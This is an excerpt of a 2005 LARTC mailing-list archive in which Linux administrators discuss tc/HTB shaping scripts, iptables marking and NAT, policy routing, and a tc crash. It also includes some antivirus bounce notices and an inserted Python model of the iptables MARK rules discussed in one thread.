$TC class add dev eth0 parent 1:3 classid 1:30 htb rate 4kbps ceil 8kbps
$TC class add dev eth0 parent 1:3 classid 1:31 htb rate 4kbps ceil 8kbps

$TC filter add dev eth0 protocol ip parent 1:0 handle 3 fw flowid 1:30
$TC filter add dev eth0 protocol ip parent 1:0 handle 4 fw flowid 1:31

# default param for htb
$TC class add dev eth0 parent 1:1 classid 1:4 htb rate 1kbps ceil 1kbps

If someone know why iptables doing it or how to realize it differently

Thanks for any help.

From shemminger@osdl.org Thu Jan 13 21:28:15 2005
From: shemminger@osdl.org (Stephen Hemminger)
Date: Thu, 13 Jan 2005 13:28:15 -0800
Subject: [LARTC] tc class ls dev (device) ... segfault.
In-Reply-To: <53559.81.15.165.20.1105629441.squirrel@81.15.165.20>
References: <53559.81.15.165.20.1105629441.squirrel@81.15.165.20>
Message-ID: <20050113132815.30cd1b67@dxpl.pdx.osdl.net>

On Thu, 13 Jan 2005 16:17:21 +0100 (CET) netf@death.pl wrote:

> Hello.
> I have got strange problem with tc utility (iproute2-ss001007) on linux
> 2.4.18.
> No matter what rules i am going to test, the result of 'tc class ls/show'
> is always the same :
> ATSLite ()# tc -s class ls dev eth1
> do_page_fault() #2: sending SIGSEGV to tc for illegal read access from
> 00000000 (epc == 00000000, ra == 00408750)
> Segmentation fault
>
> tc -s qdisc ls , tc -s filter ls ... works well.
> shaping, qos works well too.
>
> Does anybody can help me with solving this problem?
> Thx in advance.
>
> ps.
> I can't change kernel etc .. coz it's the only one kernel i can run on AP
> based on rtl8181 - planet wap-1963a

Are you using a current version of the iproute2 utilities?
One of the bugs I fixed about 6 months ago when I took over maintenance
was teaching tc about the builtin pfifo_fast qdisc.

From kaber@trash.net Fri Jan 14 02:08:02 2005
From: kaber@trash.net (Patrick McHardy)
Date: Fri, 14 Jan 2005 03:08:02 +0100
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
In-Reply-To: <41E6694A.2020203@dsl.pipex.com>
References: <1483.192.168.1.2.1105403313@maild.mine.nu> <41E5E91C.6050606@dsl.pipex.com> <41E6694A.2020203@dsl.pipex.com>
Message-ID: <41E72982.5000205@trash.net>

Andy Furniss wrote:
> Seems still broken.
>
> I built vanilla(apart from nth) 2.6.10, new iptables 1.2.11 +
> pom-200400621 with runme extra only said y to nth.
>
> I see -
>
> Chain OUTPUT (policy ACCEPT 817 packets, 103K bytes)
> pkts bytes target prot opt in out source destination
> 15 1260 MARK all -- * eth0 0.0.0.0/0
> 0.0.0.0/0 every 2th packet #0 MARK set 0x1
> 15 1260 MARK all -- * eth0 0.0.0.0/0
> 0.0.0.0/0 every 2th packet #1 MARK set 0x2
>
> Chain POSTROUTING (policy ACCEPT 817 packets, 103K bytes)
> pkts bytes target prot opt in out source destination
> 0 0 all -- * eth0 0.0.0.0/0
> 0.0.0.0/0 MARK match 0x1
> 15 1260 all -- * eth0 0.0.0.0/0
> 0.0.0.0/0 MARK match 0x2
> [root@amd /home/andy]# cat ./nth-test
> iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2
> --packet 0 -j MARK --set-mark 1
> iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2
> --packet 1 -j MARK --set-mark 2
> iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 1
> iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 2
>
> Any Ideas anyone?

Try adding "-m mark --mark X -j RETURN" rules after the MARK rules. The MARK
target is non-terminal, so you are overwriting the mark in the second rule.
Alternatively you can use "--start 1" in the one of the nth matches.

Regards
Patrick

From netf@death.pl Fri Jan 14 10:09:10 2005
From: netf@death.pl (netf@death.pl)
Date: Fri, 14 Jan 2005 11:09:10 +0100 (CET)
Subject: [LARTC] tc class ls dev (device) ... segfault.
In-Reply-To: <20050113132815.30cd1b67@dxpl.pdx.osdl.net>
References: <53559.81.15.165.20.1105629441.squirrel@81.15.165.20> <20050113132815.30cd1b67@dxpl.pdx.osdl.net>
Message-ID: <59127.81.15.165.20.1105697350.squirrel@81.15.165.20>

> Are you using a current version of the iproute2 utilities?
> One of the bugs I fixed about 6 months ago when I took over maintenance
> was teaching tc about the builtin pfifo_fast qdisc.
>

Yes. I tested tc utility of iproute2 versions :
all 2.2.4 postfix'es, 2.4.7 postfix, 2.6.9 postfix and 2.6.10 ...
behavior of tc utility is always the same :( :

ATSLite ()# tc -Version
tc utility, iproute2-ss050112
ATSLite ()# tc class ls dev eth1
do_page_fault() #2: sending SIGSEGV to tc for illegal read access from
00000000 (epc == 00000000, ra == 00409b70)
Segmentation fault

and as I said in previous post other things related to tc (shaping,qos etc
etc) work well.

I have done a little research and examine a buggy place.
Problem is in q->print_copt(q,fp,tb[TCA_OPTIONS]) in print_class function
of tc_class.c file.
Unfortunately i can't use any debugger such as gdb coz i don't have
enough memory space.
It's rtl8181 based Access Point (planet wap-1963a) with:
2 mb of flash memory
16mb of ram
MIPS architecture.
cat /proc/cpuinfo gives me:
system type : Philips Nino
processor : 0
cpu model : R3000 V0.0
...

iproute2 was cross compiled with nonmips (nonmips.sf.net) cross compiler
gcc 3.3.3.

The rules being tested are :

#CLASS: download
#!/bin/sh
DEV=eth1
TC=/sbin/tc
U32="filter add dev $DEV protocol ip parent 1:0 prio 1 u32"

echo Delete previous root qdisc
$TC qdisc del dev $DEV root >/dev/null 2>&1

echo Add root qdisc
$TC qdisc add dev $DEV root handle 1: htb default 10

echo Add root class
$TC class add dev $DEV parent 1: classid 1:1 htb rate 12500kbps ceil 12500kbps burst 2k

echo Add default class
$TC class add dev $DEV parent 1:1 classid 1:0x10 htb rate 12500kbps ceil 12500kbps burst 2k
$TC qdisc add dev $DEV parent 1:0x10 handle 0x10: pfifo limit 5

echo Add class download, que pfifo limit 5
$TC class add dev $DEV parent 1:1 classid 1:0x20 htb rate 8kbps ceil 8kbps burst 2k prio 1

echo Add client net
$TC class add dev $DEV parent 1:0x20 classid 1:0x21 htb rate 8kbps ceil 8kbps burst 2k prio 1 quantum 1500
$TC ${U32} match ip dst 192.168.200.2/32 flowid 1:0x21
$TC qdisc add dev $DEV parent 1:0x21 handle 0x21: pfifo limit 5

I hope there is a solution.
thx in advance.

From tomasz.paszkowski@e-wro.pl Fri Jan 14 10:21:46 2005
From: tomasz.paszkowski@e-wro.pl (Tomasz Paszkowski)
Date: Fri, 14 Jan 2005 11:21:46 +0100
Subject: [LARTC] hashing filters
In-Reply-To: <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z>
References: <055901c4f8a2$0edbe920$3400010a@ipkopb2qcn7w4z> <20050112131121.GA5641@krezus.e-wro.net> <05ea01c4f8d1$a897a3e0$3400010a@ipkopb2qcn7w4z>
Message-ID: <20050114102146.GA3465@krezus.e-wro.net>

On Wed, Jan 12, 2005 at 07:08:03PM +0100, Valton Hashani wrote:
> j=0;
>
> while [ $j -le 254 ]
>
> do
>     i=0;
>
>     while [ $i -le 254 ]
>     do
>         hexi=`echo "obase=16; $i" | bc`
>         echo tc filter add dev eth0 protocol ip parent 1:2 u32 ht 2:$hexi: match ip dst 192.168.$j.$i flowid 1:3
>         tc filter add dev eth0 protocol ip parent 1:2 u32 ht $j:$hexi match ip dst 192.168.$j.$i flowid 1:3
>         i=$((i+1))
>     done
>
>     j=$((j+1))
> done

From saz"

Hi guys, i have a problem with a configuration what i'm trying to do.
I have two computers with linux, A and B, connected in the same network
with this configuration:

PC1 A: 192.168.192.1

PC2 B: 192.168.192.30

The PC1 A is a firewall doing nat...
this one is connected to the internet via an adsl modem and of course it
have its own public ip , and the router B is a smtp server but connected
behind the router A, what i'm trying to do is redirect the smtp incoming
traffic of the router A to the router B using iproute2 and netfilter tools

This is the configuration on the router A:

iptables -t mangle -A POSTROUTING -p tcp --dport 25 -j MARK --set-mark 1
( this marks the smtp packets with 1 )

i create a table called "smtp" in the rt_tables file.

ip rule add fwmark 1 table smtp
( this is the rule for my table smtp )

and finally i declare a via in my smtp table, so the smtp traffic would
have to go by this way.

ip route add default via 192.168.192.30 table smtp

Ok... for example if i make a telnet to PC1 on the 25 port.. this should
redirect me to PC2 where is my real smtp server, but is not working...
any idea of why ? the PC2 have not a firewall..

Thank you!!

From andy.furniss@dsl.pipex.com Fri Jan 14 15:10:02 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Fri, 14 Jan 2005 15:10:02 +0000
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
In-Reply-To: <41E72982.5000205@trash.net>
References: <1483.192.168.1.2.1105403313@maild.mine.nu> <41E5E91C.6050606@dsl.pipex.com> <41E6694A.2020203@dsl.pipex.com> <41E72982.5000205@trash.net>
Message-ID: <41E7E0CA.5090509@dsl.pipex.com>

Patrick McHardy wrote:
> Andy Furniss wrote:
>
>> Seems still broken.
>>
>> I built vanilla(apart from nth) 2.6.10, new iptables 1.2.11 +
>> pom-200400621 with runme extra only said y to nth.
>>
>> I see -
>>
>> Chain OUTPUT (policy ACCEPT 817 packets, 103K bytes)
>> pkts bytes target prot opt in out source destination
>> 15 1260 MARK all -- * eth0 0.0.0.0/0
>> 0.0.0.0/0 every 2th packet #0 MARK set 0x1
>> 15 1260 MARK all -- * eth0 0.0.0.0/0
>> 0.0.0.0/0 every 2th packet #1 MARK set 0x2
>>
>> Chain POSTROUTING (policy ACCEPT 817 packets, 103K bytes)
>> pkts bytes target prot opt in out source destination
>> 0 0 all -- * eth0 0.0.0.0/0
>> 0.0.0.0/0 MARK match 0x1
>> 15 1260 all -- * eth0 0.0.0.0/0
>> 0.0.0.0/0 MARK match 0x2
>> [root@amd /home/andy]# cat ./nth-test
>> iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2
>> --packet 0 -j MARK --set-mark 1
>> iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2
>> --packet 1 -j MARK --set-mark 2
>> iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 1
>> iptables -t mangle -A POSTROUTING -o eth0 -m mark --mark 2
>>
>> Any Ideas anyone?
>
>
>
> Try adding "-m mark --mark X -j RETURN" rules after the MARK rules. The
> MARK
> target is non-terminal, so you are overwriting the mark in the second rule.
> Alternatively you can use "--start 1" in the one of the nth matches.

Thanks Patrick - I assumed that with the same counter and packet 0/1
that nth would only actually match alternate packets (start didn't work).

So this works -

iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 --packet 0 -j MARK --set-mark 1
iptables -t mangle -A OUTPUT -o eth0 -m mark --mark 1 -j RETURN
iptables -t mangle -A OUTPUT -o eth0 -m nth --counter 1 --every 2 --packet 1 -j MARK --set-mark 2
iptables -t mangle -A OUTPUT -o eth0 -m mark --mark 2 -j RETURN

but is over complicated really - Why I didn't do it like below in the
first place I don't know

iptables -t mangle -A OUTPUT -o eth0 -j MARK --set-mark 1
iptables -t mangle -A OUTPUT -o eth0 -m nth --every 2 -j MARK --set-mark 2

Andy.

PS had to remove junk@maild.mine.nu from CC as my ISP server threw a
domain not found - can someone else CC him please.

From techsupport@sqliaison.com Sat Jan 15 06:30:20 2005
From: techsupport@sqliaison.com (techsupport@sqliaison.com)
Date: Sat, 15 Jan 2005 01:30:20 -0500
Subject: [LARTC] SQLiaison E-Mail Virus Alert
Message-ID: <000001c4facb$af782c10$50f7cdcd@sqliaison.com>

SQLiaison Mail Server: GroupShield™ Alert

The email server has discovered a problem with the following email.

Please note that the sender of the email will not be notified with this message.

> More information :

Date/Time sent: 15 Jan 2005 01:30:18
Subject line: [LARTC] Re:
From: lartc-admin@mailman.ds9a.nl
To: LARTC
Action taken: Deleted
Virus Found: W32/Bagle.ai@MM
Reason: Anti-Virus
Rule Group:

For additional information, please contact SQLiaison Support Team

techsupport@sqliaison.com
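
The counters in Andy Furniss's listing and Patrick McHardy's explanation of the non-terminal MARK target, from the "How to balance OUTBOUND traffic by packet" exchange above, replayed as a small Python model (an added example, not code from the thread or from netfilter). The nth counter behaviour in `NthCounters` is an assumption chosen to be consistent with the packet counts Andy posted, and all class and function names are hypothetical.

```python
"""Replay of the mangle OUTPUT chains from the thread (illustrative model)."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


class NthCounters:
    """Counters shared by nth rules, keyed by --counter (model assumption)."""

    def __init__(self) -> None:
        self.values: Dict[int, int] = {}

    def packet_match(self, counter: int, every: int, packet: int) -> bool:
        # Assumed --packet behaviour: the counter advances only on a match,
        # so rules sharing a counter pass the turn to one another.
        current = self.values.get(counter, 0)
        if current != packet:
            return False
        self.values[counter] = (current + 1) % every
        return True

    def every_match(self, counter: int, every: int) -> bool:
        # Assumed behaviour without --packet: advance on every evaluation,
        # match one packet out of each `every`.
        current = self.values.get(counter, 0)
        self.values[counter] = (current + 1) % every
        return current == 0


Packet = Dict[str, int]
Match = Callable[[Packet, NthCounters], bool]


@dataclass
class Rule:
    match: Match
    target: str                 # "MARK" (non-terminal) or "RETURN"
    mark: Optional[int] = None
    pkts: int = 0               # the pkts column of `iptables -L -v`


def nth_packet(counter: int, every: int, packet: int) -> Match:
    return lambda pkt, ctr: ctr.packet_match(counter, every, packet)


def nth_every(every: int, counter: int = 0) -> Match:
    return lambda pkt, ctr: ctr.every_match(counter, every)


def has_mark(value: int) -> Match:
    return lambda pkt, ctr: pkt["mark"] == value


def any_packet(pkt: Packet, ctr: NthCounters) -> bool:
    return True


def traverse(chain: List[Rule], pkt: Packet, counters: NthCounters) -> Packet:
    for rule in chain:
        if not rule.match(pkt, counters):
            continue
        rule.pkts += 1
        if rule.target == "MARK":
            pkt["mark"] = rule.mark   # non-terminal: the next rule still runs
        elif rule.target == "RETURN":
            break                     # stop here, the mark set so far is kept
    return pkt


def original_chain() -> List[Rule]:
    # Andy's nth-test: both rules use --counter 1 --every 2.
    return [Rule(nth_packet(1, 2, 0), "MARK", 1),
            Rule(nth_packet(1, 2, 1), "MARK", 2)]


def return_chain() -> List[Rule]:
    # Patrick's suggestion: RETURN as soon as a mark has been set.
    return [Rule(nth_packet(1, 2, 0), "MARK", 1),
            Rule(has_mark(1), "RETURN"),
            Rule(nth_packet(1, 2, 1), "MARK", 2),
            Rule(has_mark(2), "RETURN")]


def simplified_chain() -> List[Rule]:
    # Andy's short form: mark everything 1, overwrite every second packet.
    return [Rule(any_packet, "MARK", 1),
            Rule(nth_every(2), "MARK", 2)]


def run(chain: List[Rule], n_packets: int) -> Tuple[List[int], Dict[int, int]]:
    """Return per-rule pkts counters and how many packets left with each mark."""
    counters = NthCounters()
    marks = {0: 0, 1: 0, 2: 0}
    for _ in range(n_packets):
        pkt = traverse(chain, {"mark": 0}, counters)
        marks[pkt["mark"]] += 1
    return [rule.pkts for rule in chain], marks


if __name__ == "__main__":
    for name, build in (("original", original_chain),
                        ("with RETURN", return_chain),
                        ("simplified", simplified_chain)):
        print(name, run(build(), 16))
```

With 15 packets the first chain gives the same picture as the posted listing: both MARK rules count 15 and every packet leaves with mark 2, while the other two chains split the packets evenly between the marks.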

From nug@sch.bme.hu Sat Jan 15 11:11:19 2005
From: nug@sch.bme.hu (Tóth Nándor)
Date: Sat, 15 Jan 2005 12:11:19 +0100
Subject: [LARTC] iproute2 + netfilter problem
In-Reply-To: <000801c4fa41$f5c80080$02c0a8c0@sazhost>
References: <000801c4fa41$f5c80080$02c0a8c0@sazhost>
Message-ID: <41E8FA57.8070608@sch.bme.hu>

Hali,

saz wrote:
> Hi guys, i have a problem with a configuration what i'm trying to do.
> I have two computers with linux, A and B, connected in the same network
> with this configuration:
>
> PC1 A: 192.168.192.1
>
> PC2 B: 192.168.192.30
>
> The PC1 A is a firewall doing nat... this one is connected to the
> internet via an adsl modem and of course it have its own public ip , and
> the router B is a smtp server but connected behind the router A, what
> i'm trying to do is redirect the smtp incoming traffic of the router A
> to the router B using iproute2 and netfilter tools
>
> This is the configuration on the router A:
>
> *iptables -t mangle -A POSTROUTING -p tcp --dport 25 -j MARK --set-mark
> 1* ( this marks the smtp packets with 1 )
>
> i create a table called "smtp" in the rt_tables file.
>
> *ip rule add fwmark 1 table smtp* ( this is the rule for my table smtp )
>
> and finally i declare a via in my smtp table, so the smtp traffic would
> have to go by this way.
>
> *ip route add default via 192.168.192.30 table smtp*
> **
> Ok... for example if i make a telnet to PC1 on the 25 port.. this should
> redirect me to PC2 where is my real smtp server, but is not
> working... any idea of why ? the PC2 have not a firewall..

I think you totally misunderstood a few things. Routing is a different
layer (IP) than port 25 (smtp, TCP). You can not make tcp port 25
redirect using routing tools.
Here is an example how to do it.

# rewrite the destination of incoming SMTP connections to the internal server
$IPTABLES -t nat -A PREROUTING -i $EXTERNAL_INTERFACE -s $ANYWHERE -p tcp --dport 25 \
    -j DNAT --to-destination 192.168.1.x:25
# let the translated connections through (iptables accepts only one -d per rule,
# so the rule matches the server address itself)
$IPTABLES -A FORWARD -i $EXTERNAL_INTERFACE -p TCP -s $ANYWHERE --sport $UNPRIVPORTS \
    -d 192.168.1.x --dport 25 -j ACCEPT

I recommend you to read a book about basic networking layers and/or
iptables.

--
Udv,
Nandor

From techsupport@sqliaison.com Sat Jan 15 17:41:14 2005
From: techsupport@sqliaison.com (techsupport@sqliaison.com)
Date: Sat, 15 Jan 2005 12:41:14 -0500
Subject: [LARTC] SQLiaison E-Mail Virus Alert
Message-ID: <000001c4fb29$68bb6900$50f7cdcd@sqliaison.com>

SQLiaison Mail Server: GroupShield™ Alert

The email server has discovered a problem with the following email.

Please note that the sender of the email will not be notified with this message.

> More information :

Date/Time sent: 15 Jan 2005 12:41:14
Subject line: [LARTC] Re:
From: lartc-admin@mailman.ds9a.nl
To: LARTC
Action taken: Deleted
Virus Found: W32/Bagle@MM!pwdzip
Reason: Anti-Virus
Rule Group:

For additional information, please contact SQLiaison Support Team

techsupport@sqliaison.com

From ashling.odriscoll@cit.ie Sun Jan 16 23:56:55 2005
From: ashling.odriscoll@cit.ie (Ashling O'Driscoll)
Date: Sun, 16 Jan 2005 23:56:55 -0000
Subject: [LARTC] Identification of TC Queueing Discipline
Message-ID: <380-220051016235655498@cit.ie>

Hi all,

I previously mailed this list explaining that I have been given the task of
implementing a dynamic traffic shaping scheme on an existing network. I
was looking for guidance on how I should approach this but
unfortunately I was unable to provide much information about the
existing traffic shaping system.

I have recently obtained the existing tc scripts though and was
hoping someone could help me identify what scheme is in place...I was
thinking it is HTB but as Im really new to this whole area, I thought
someone could confirm/clear this up for me.

Anyhow I have included some of the script below with the IP addresses
represented by xxx.xxx.xxx.xxx

Again thank you in advance and any help would be appreciated,
Regards,
Aisling.

# use add_bucket() to add the buckets and add_ip() to add filters for the hosts
#
# add_bucket DEVICE BUCKET PARENT RATE CEIL
# add_ip DEVICE IP[/MASK] BUCKET
# add_ip_range DEVICE IP MASK BUCKET
#
# top level buckets
add_bucket br0 10 - 4096 4096
add_bucket eth2 10 - 4096 4096
add_bucket eth3 10 - 2048 2048
add_bucket eth2 9 10 64 2500
add_bucket eth2 8 10 64 512
add_bucket eth2 7 10 64 1024

# Part 1 WAN
# ------
# Note that Everything else has to match all addresses as the Dest
# address in each outgoing packet could be anything.
# Add src after x.x.x.x address to limit upload speed
#
add_bucket br0 11 10 64 512
add_ip br0 xxx.xxx.xxx.xxx 11 src #
add_ip br0 xxx.xxx.xxx.xxx 11 src #
add_bucket br0 12 10 64 4096
add_ip br0 xxx.xxx.xxx.xxx 12 #
add_ip br0 0.0.0.0/0 12 #Everything Else

# Part 2 PAN
# ------
# Note that Everything else has to match all addresses as the Dest
# address in each outgoing packet could be anything.
#
add_bucket eth3 11 10 64 2048
add_ip eth3 xxx.xxx.xxx.xxx 11 # S1
add_ip eth3 0.0.0.0/0 11 #Everything Else

# Part 3
# ------
# Users on LAN side. Each needs to be assigned an individual bucket, so that
# all processes are treated from a single source.
#
# 3 sub-buckets below eth2
# 11 - Buc 10-11
# 12 - Buc 10-12
# 13 - Buc 10-13
#
add_bucket eth2 11 9 64 2500
add_bucket eth2 12 9 64 2500
add_bucket eth2 13 9 64 2000
add_bucket eth2 14 9 64 256
add_bucket eth2 15 9 64 256

# Let's just focus under bucket 12 for now.
# 21 - Buc 10-12-21
# 22 - Buc 10-12-22
# 33 - Buc 10-12-23
add_bucket eth2 21 11 64 2500
add_bucket eth2 22 12 64 2500
add_bucket eth2 23 13 64 2000

add_bucket eth2 80 23 64 512 #..
add_bucket eth2 81 23 64 512 #..
add_bucket eth2 82 23 64 512 #..
add_bucket eth2 83 23 64 512 #..
add_bucket eth2 84 23 64 512 #..
add_bucket eth2 85 23 64 512 #..
add_bucket eth2 86 23 64 512 #.

# a bucket and ip address below eth2 (10)
add_bucket eth2 51 23 64 512 # 1
add_ip eth2 xxx.xxx.xxx.xxx 51

# a bucket and ip address below eth2 (10)
add_bucket eth2 52 23 64
add_ip eth2 xxx.xxx.xxx.xxx 52

add_bucket eth2 53 23 64 512
add_ip eth2 xxx.xxx.xxx.xxx 53

add_bucket eth2 54 23 64 512
add_ip eth2 xxx.xxx.xxx.xxx 54

-------------------Legal Disclaimer---------------------------------------

The above electronic mail transmission is confidential and intended only
for the person to whom it is addressed. Its contents may be protected by
legal and/or professional privilege. Should it be received by you in error
please contact the sender at the above quoted email address. Any
unauthorised form of reproduction of this message is strictly prohibited. The
The Institute does not guarantee the security of any information electronically transmitted and is not liable if the information contained in this communication is not a proper and complete record of the message as transmitted by the sender nor for any delay in its receipt. From andy.furniss@dsl.pipex.com Mon Jan 17 00:17:56 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Mon, 17 Jan 2005 00:17:56 +0000 Subject: [LARTC] htb script In-Reply-To: <001301c4f564$02d71000$fd00000a@jayesh> References: <001301c4f564$02d71000$fd00000a@jayesh> Message-ID: <41EB0434.3090207@dsl.pipex.com> jayesh wrote: > dear all > iam newbie , i have 256 kbits of down link and 64 kbits of up link iam using squid and htb i have got this while browsing the net , there are some few issues i need help > while running the script i want browsing to be as fast as possible , uplink especially kaaza should not eat my band width. > eth1 got public ip address and eth0 is internal with network 10.0.0.0/24 iam also using nat , how can i make squid incorporates with htb (squid uses 3128) > here is my script You need to patch squid to mark on hit/miss. http://www.docum.org/docum.org/faq/cache/65.html Andy. From andy.furniss@dsl.pipex.com Mon Jan 17 00:26:44 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Mon, 17 Jan 2005 00:26:44 +0000 Subject: [LARTC] dynamic bandwidth allocation In-Reply-To: <380-2200513121218967@cit.ie> References: <380-2200513121218967@cit.ie> Message-ID: <41EB0644.1060601@dsl.pipex.com> Ashling O'Driscoll wrote: > Hi, > > Hope someone can help me. I am a student who has been given a > project to develop a dynamic bandwidth service. > > I currently have a linux router which at the moment gives users > static bandwidth and assigns each of them to a bucket. I have not > gotten information yet as to whether each bucket is serviced in a > round robin fashion or whether certain buckets get preferential > treatment (i.e.
bucket 1 service 60% as opposed to bucket 2 40%). > > I need to implement dynamic bandwidth/traffic shaping based on > certain types of traffic/applications e.g.voice or based on > particluar users. So basically if voice traffic is being delayed and > not getting through,the bandwidth should be dynamically adjusted to > accommodate this and then readjusted once the problem is resolved. > > I have researched the iproute 2 package,tc, packet priorities, tos > bytes, queues etc the last few days but I am actually confused at > this stage by all the information. I have also come across a > scripting tool called "pacemaker" from st josephs university in > america which seems "close" to what I want but not quite it. > > If anyone could offer me advice on how I should approach this, > whether it's "do-able" and an estimation of what kind of task Im > undertaking i.e. how difficult and how much time this might take, I > would be VERY grateful. As I have not worked in industry before and > am not very familiar with linux, I dont know how possible/difficult > this project is or even how to approach it. > Have a look at HTB or HFSC, HFSC is quite new so you won't find as many examples. http://www.docum.org http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm Andy. From toto@fortesys.ro Mon Jan 17 13:48:39 2005 From: toto@fortesys.ro (Iosif Peterfi) Date: Mon, 17 Jan 2005 15:48:39 +0200 Subject: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved Message-ID: <009501c4fc9b$3fd8f4d0$da01a8c0@FORTEWKS001> Hello, I setup iproute2 and iptables on my box, is a P4 2000 Ghz / 1GB memory. I have setup squid and iptables to be a transparent proxy, with cache. I've read on lartc.org almost everything and i want to ask if there is a u32 match for the connection time or something like that, or an u32 match for the packet number in a connection. 
All i want to do is shape the web traffic for long conections wich are not HTML webpages, i want to slow down those connections. I know that can be overriden by stopin/resuming the transfer but i still want to do it since people start downloading from HTTP with many connections, during the day and leave the office, i have no time to hunt them, so i just want to classify those connections if is possible. If there is any patch for squid to classify URLS would be great, i`ll just put html/php/jsp/etc.. in the priority class. Toto -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://linux.bitdefender.com/ From jasonb@edseek.com Mon Jan 17 16:50:27 2005 From: jasonb@edseek.com (Jason Boxman) Date: Mon, 17 Jan 2005 11:50:27 -0500 Subject: [LARTC] iproute2 + iptables - match the connection time or packets sent/recieved In-Reply-To: <009501c4fc9b$3fd8f4d0$da01a8c0@FORTEWKS001> References: <009501c4fc9b$3fd8f4d0$da01a8c0@FORTEWKS001> Message-ID: <200501171150.27568.jasonb@edseek.com> On Monday 17 January 2005 08:48, Iosif Peterfi wrote: > Hello, > > All i want to do is shape the web traffic for long conections wich are not > HTML webpages, i want to slow down those connections. > I know that can be overriden by stopin/resuming the transfer but i still > want to do it since people start downloading from HTTP with many > connections, during the day and leave the office, i have no time to hunt > them, so i just want to classify those connections if is possible. Sure, you can do that with the connbytes Netfilter module. After someone downloads some given amount of data you can reclassify that traffic from interactive-Web to bulk-Web or something similar. I've been meaning to do this myself, but haven't gotten to it. 
-- Jason Boxman Perl Programmer / *NIX Systems Administrator Shimberg Center for Affordable Housing | University of Florida http://edseek.com/ - Linux and FOSS stuff From techsupport@sqliaison.com Mon Jan 17 17:01:25 2005 From: techsupport@sqliaison.com (techsupport@sqliaison.com) Date: Mon, 17 Jan 2005 12:01:25 -0500 Subject: [LARTC] SQLiaison E-Mail Virus Alert Message-ID: <000001c4fcb6$2dc243d0$50f7cdcd@sqliaison.com> This is a multi-part message in MIME format. ------=_NextPart_000_0001_01C4FC8C.44EE85C0 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable SQLiaison Mail Server: GroupShield™ Alert The email server has discovered a problem with the following email. Please note that the sender of the email will not be notified with this message. > More information : Date/Time sent: 17 Jan 2005 12:01:23 Subject line: [LARTC] Re: From: lartc-admin@mailman.ds9a.nl To: LARTC Action taken: Deleted Virus Found: W32/Bagle.ai@MM Reason: Anti-Virus Rule Group: For additional information, please contact SQLiaison Support Team techsupport@sqliaison.com
------=_NextPart_000_0001_01C4FC8C.44EE85C0-- From Ian Nicholls Mon Jan 17 23:33:17 2005 From: Ian Nicholls (Ian Nicholls) Date: Tue, 18 Jan 2005 10:33:17 +1100 Subject: [LARTC] iproute2 problem Message-ID: Hi, I have the following network configuration

eth1 -- 150.101.118.158 - Public IP supplied by ISP
eth0 -- 203.34.165.2 - Public IP allocated from my company's address range
gir0 -- 203.34.165.1 - ip ip tunnel to transfer the public IP address range of my company

The Routing is as follows :

Destination      Gateway          Genmask          Flags Metric Ref Use Iface
150.101.118.156  0.0.0.0          255.255.255.252  U     0      0   0   eth1
203.34.165.0     0.0.0.0          255.255.255.0    U     0      0   0   eth0
127.0.0.0        127.0.0.1        255.0.0.0        UG    0      0   0   lo
0.0.0.0          150.101.118.157  0.0.0.0          UG    0      0   0   eth1

What I want to do is have any traffic that comes down the gir0 link to return via the gir0 link, any traffic originating from the 203.34.165.0/24 address range to be NAT'd to the 150.101.118.156 range as the ISP charges nothing for traffic on this range to its own mirrors etc. In order to do this I have the following script run after the ip-ip tunnel is started

#!/bin/bash
/sbin/ip rule add from 203.34.165.1 table Tunnel
/sbin/ip route add default via 203.34.165.1 dev gir0 table Tunnel
/sbin/ip route flush cache

Now for the crazy problem...... Email coming in to 203.34.165.1 and 203.34.165.2 from some locations like hotmail.com does not make it. I have done a tcpdump and the emails that get lost start OK and somewhere in the transfer the packets get lost and connection fails. Most other locations work fine, e.g. gmail.com. I would normally just write this off as another hotmail issue and not worry about it but this is happening to a number of other email sources as well. What appears to be happening is that the traffic starts out fine going back and forward over the ip-ip tunnel like I expect and then a packet does not go via this path, it just goes out the interface with the default route.
This subsequently gets lost somewhere and no ack is received. kernel and ip utilities versions are as follows:

ip -V
ip utility, iproute2-ss040831
uname -a
Linux spud.babelsoft.com.au. 2.6.10-gentoo-r4 #1 Thu Jan 13 21:08:50 EST 2005 i686 AMD Athlon(tm) XP 1700+ AuthenticAMD GNU/Linux

Does anyone have any ideas. Also for some strange reason the server with this problem also refuse to use the 150.101.118.158 address as an MX, which I am unable to determine the cause of. Ian Nicholls From sanjeev_ravindran@linuxmail.org Tue Jan 18 06:11:15 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Tue, 18 Jan 2005 14:11:15 +0800 Subject: [LARTC] Doubt regarding priority of classes with HTB Message-ID: <20050118061115.8420123EF73@ws5-4.us4.outblaze.com> Hi, I'm a bit confused with the priority of different classes with HTB. How it will be? Will the class with lowest no: have maximum priority? Any help is most appreciated, Thanks in advance, Sanjeev -- ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. Powered by Outblaze From roderick tapang Tue Jan 18 07:20:42 2005 From: roderick tapang (roderick tapang) Date: Tue, 18 Jan 2005 15:20:42 +0800 Subject: [LARTC] failover works - but balancing does not Message-ID: here's the setup (two dsl - same provider)

                     +-----> link1
LAN----- linux box --|             |----------internet
                     +-----> link2

the setup is ok in terms of the failover requirement. the other link takes over when one is down. however, there is a very noticeable lag when both lines are up. i've tried changing the weight value to a higher one but the links are still under utilized and some client machines playing games or mostly disconnected. taking down one link makes the connection ok. any suggestions? do i need to patch the kernel? below is the script i'm using on a mandrake 10.1 box. thanks.
erik

